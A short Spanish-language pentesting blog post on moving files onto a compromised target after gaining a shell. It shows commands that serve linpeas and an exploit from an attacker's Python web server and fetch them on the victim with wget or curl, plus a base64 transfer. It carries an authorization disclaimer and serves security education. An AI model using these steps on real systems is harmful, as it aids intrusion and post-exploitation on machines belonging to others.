~ / blog / pentesting
KALI

Transfiere archivos al objetivo

Ya tienes una shell; ahora necesitas subir tus herramientas, como linpeas o un exploit.

Los métodos: montas un servidor web rápido con python en tu máquina, y en el objetivo descargas con wget o curl. Si no hay salida directa, usas netcat en ambos lados.

Y para textos pequeños, copias en base64 y lo pegas. Saber mover archivos en cualquier situación es una habilidad básica de post-explotación.

Ten varios métodos listos, porque no siempre funciona el mismo.

# los comandos

kali@kali:~$ python3 -m http.server 80copiar
Serving HTTP on 0.0.0.0 port 80
www-data@victim:$ wget http://10.0.0.50/linpeas.sh -O /tmp/lp.sh || curl -O http://10.0.0.50/lp.shcopiar
www-data@victim:$ cat exploit.b64 | base64 -d > exploit # sin red de salidacopiar
Solo con permiso. Esto se muestra con fines educativos y defensivos: úsalo únicamente en sistemas propios o donde tengas autorización. Entender el ataque es lo que te permite defenderte de él.
root@cero: ~/newsletter
┌──(root@cero)-[~]
└─# suscribir --envio-semanal
un comando a la semana que te hace más difícil de hackear.
una sola herramienta, explicada en español claro, cada semana. lo mejor de los reels, directo a tu correo.
email =
sin spam. un correo a la semana. te sales cuando quieras.